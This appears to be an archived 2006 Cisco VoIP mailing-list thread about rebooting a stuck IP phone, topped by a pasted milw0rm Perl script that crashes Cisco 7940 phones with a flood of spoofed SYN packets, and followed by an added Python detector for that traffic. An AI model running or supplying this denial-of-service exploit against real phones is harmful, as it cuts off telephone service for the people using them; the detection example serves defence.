[cisco-voip] Remotely rebooting Phone without using Callmanager (in CM not connected, but can still ping/http)
Lelio Fulgenzi
lelio at uoguelph.ca
Fri Feb 17 19:59:06 EST 2006
#!/usr/bin/perl
# This is made for trashing cisco 7940 ip phones. kokanin made/discovered this.
# A packetcount of 1000 and a packetdelay of 0.002 sent to port 80 makes my
# phone reboot - play with the settings and stuff. PRIVATE PRIVATE PRIVATE!!!
# not private anymore. Vulnerable phones are running ver. 7.0(2.0) using the skinny
# protocol - this is not for the SIP firmware.
use Net::RawIP;
use Time::HiRes;
$pkt = new Net::RawIP;
die "Usage $0 <src> <dst> <target port> <number of pkts> <packet delay>" unless ($ARGV[4]);
$pkt->set({
ip => {
saddr => $ARGV[0],
daddr => $ARGV[1]
},
tcp=> { dest => $ARGV[2],
syn => 1,
seq => 0,
ack => 0}
});
for(1..$ARGV[3]){ $pkt->set({tcp=>{source=>int(rand(65535))}});Time::HiRes::sleep($ARGV[4]); $pkt->send; };
# milw0rm.com [2006-01-10]
----- Original Message -----
From: Lelio Fulgenzi
To: Kevin Thorngren ; Hans-Peter Walter
Cc: cisco-voip at puck.nether.net
Sent: Friday, February 17, 2006 7:53 PM
Subject: Re: [cisco-voip] Remotely rebooting Phone without usingCallmanager(in CM not connected, but can still ping/http)
aren't there a few exploits out there that cause a phone to reboot? ;)
----- Original Message -----
From: Kevin Thorngren
To: Hans-Peter Walter
Cc: cisco-voip at puck.nether.net
Sent: Friday, February 17, 2006 7:46 PM
Subject: Re: [cisco-voip] Remotely rebooting Phone without using Callmanager(in CM not connected, but can still ping/http)
Not sure of any other ideas at this point. Just curious if there is any Skinny traffic from the phone to CCM. Use Network Monitor on the Primary CCM to see if the phone is attempting to create a TCP connection to the CCM server and if it is failing.
Kevin
On Feb 17, 2006, at 7:38 PM, Hans-Peter Walter wrote:
hi,
we have a problem with a SRST-config at a remote site, so I played around and set a
line of a phone to "Auto Answer with speakerphone" and could hear some servers running in the background,
and did some testing. The SRST still doesn't work properly, but that's another story...
Now the phone is somehow stuck. I can ping it, I can go to the phone website http://<phone-ip>, but it
is *NOT* registered in Callmanager and not on the SRST-Router.
I denied access for that phone to the callmanager (hoped it would try to reboot) ==> no success
I rebooted the SRST-Router (default-gateway of the phone) ==> no success
I shut down and enabled the switch-port where the phone is connected ==> no success
I even rebooted the entire switch ;-) ==> no success
After all these actions I can still ping / http to the phone...
I wish I had PoE there, because I think I would just need to unplug power....
soooo: Is there another way to reboot a phone *without* the Callmanager,
maybe something hidden like http://<phone-ip>/admin or something?
thanks and a nice weekend...
HP
_______________________________________________
cisco-voip mailing list
cisco-voip at puck.nether.net
https://puck.nether.net/mailman/listinfo/cisco-voip
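A defender's view of the traffic the script at the top of this message generates, as an added example that is not part of the original post or of the milw0rm code: it flags a destination receiving a burst of bare SYNs whose sequence number is 0. The packet record layout, the addresses (documentation range), the millisecond timestamps and the threshold are assumptions chosen for illustration.

```python
from collections import defaultdict, deque

def find_syn_bursts(packets, window_ms=1000, threshold=100):
    """Return {(dst, dport): peak count} for destinations that receive at least
    `threshold` bare SYNs with sequence number 0 within `window_ms`.

    packets: dicts with ts_ms, src, dst, sport, dport, flags, seq, sorted by time.
    Keyed on destination only: the script takes its source address from the
    command line, so the source field of these packets cannot be trusted.
    """
    recent = defaultdict(deque)   # (dst, dport) -> timestamps still in window
    peaks = {}
    for p in packets:
        # Bare SYN with initial sequence number 0; normal TCP stacks
        # choose an unpredictable initial sequence number.
        if p["flags"] != "S" or p["seq"] != 0:
            continue
        key = (p["dst"], p["dport"])
        q = recent[key]
        q.append(p["ts_ms"])
        while p["ts_ms"] - q[0] > window_ms:
            q.popleft()
        if len(q) >= threshold:
            peaks[key] = max(peaks.get(key, 0), len(q))
    return peaks

def sample_capture():
    """Constructed sample: three ordinary connections to the phone's web page,
    then 1000 SYNs 2 ms apart (the count and delay named in the script comment)."""
    pkts = []
    for i, isn in enumerate((0x5A17C3E1, 0x1B22F00D, 0x7E01AA42)):  # constructed ISNs
        pkts.append({"ts_ms": i * 5000, "src": "192.0.2.10", "dst": "192.0.2.50",
                     "sport": 40000 + i, "dport": 80, "flags": "S", "seq": isn})
    for n in range(1000):  # seq 0, source port changing on every packet
        pkts.append({"ts_ms": 20000 + n * 2, "src": "192.0.2.99",
                     "dst": "192.0.2.50", "sport": 1024 + (n * 7919) % 60000,
                     "dport": 80, "flags": "S", "seq": 0})
    return pkts

if __name__ == "__main__":
    for (dst, dport), peak in find_syn_bursts(sample_capture()).items():
        print(f"ALERT {dst}:{dport} peak of {peak} zero-seq SYNs inside the window")
```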